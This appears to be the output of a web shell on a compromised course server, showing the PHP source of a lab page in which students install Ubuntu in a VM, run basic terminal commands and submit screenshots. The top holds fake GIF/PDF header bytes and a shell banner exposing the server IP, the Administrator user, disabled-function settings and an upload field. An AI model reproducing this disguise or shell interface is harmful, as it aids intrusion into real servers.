GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2505/Labs/Lab01/ |
Upload File : |
<? // JimMartinson/CST2505/Labs/Lab01.php require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. $disabled = ''; $disabled = ' disabled'; // Comment this line to enable lab. ?> <fieldset><legend>Description</legend> The purpose of this lab is to demonstrate your ability to install Ubuntu desktop (linux variant) and begin to become familiar with the Desktop. <?=$gradeNote?> <? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <fieldset><legend>Lab Instruction</legend> Create a <b class="copyText"><?=$evaluationName?></b> folder and keep all screenshots and any copied files for this assignment in that <b><?=$evaluationName?></b> folder. <ol class="count"> <li>Create and power on an Ubuntu Linux VM.</li> <li>Install Ubuntu 18 desktop.</li> <li>Restart your Ubuntu 18 desktop VM.</li> <li> Take a screenshot of the Ubuntu login screen and save it as <b class="copyText nowrap"><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/Ubuntu_login.png" width="805" height="604" alt="Ubuntu login screen example screenshot"/><br> <? showEnd (); ?> <br>All screenshots for this class must be: <ul> <li>Of only the part of the screen I requested for the screenshot.</li> <li>Saved in <a href="http://www.libpng.org/pub/png/">Portable Network Graphics</a> (.png) format.</li> </ul> </li> <li> From a terminal window, enter the following commands:<br> <pre class="kbd copyText">uname -a cat /etc/lsb-release</pre> </li> <li> Take a screenshot of the Terminal window and save it as <b class="copyText nowrap"><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png</b>. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="images/Ubuntu_uname.png" width="734" height="445" alt="Terminal window example screenshot"/><br> <? showEnd (); ?> </li> <li> Install VMware Tools. <br> From a terminal window, enter the following commands:<br> <pre class="kbd copyText">sudo apt update sudo apt install open-vm-tools-desktop</pre> </li> <li>Turn in your assignment: <ol type="a"> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder: <ol type="a"> <li><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png.</li> <li><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b class="copyText"><?=$uploadFilename?></b>.</li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"> for grading.</li> </ol> </li> </ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?> </fieldset> <fieldset><legend>Notes</legend> I am currently using VMware Workstation 15 Player as my remote console. You can download it from <a href="https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html">here</a>. </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. #require('../../ReferencesResources.phpinc'); #require($Instructor['Path'].'/ContactInformation.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>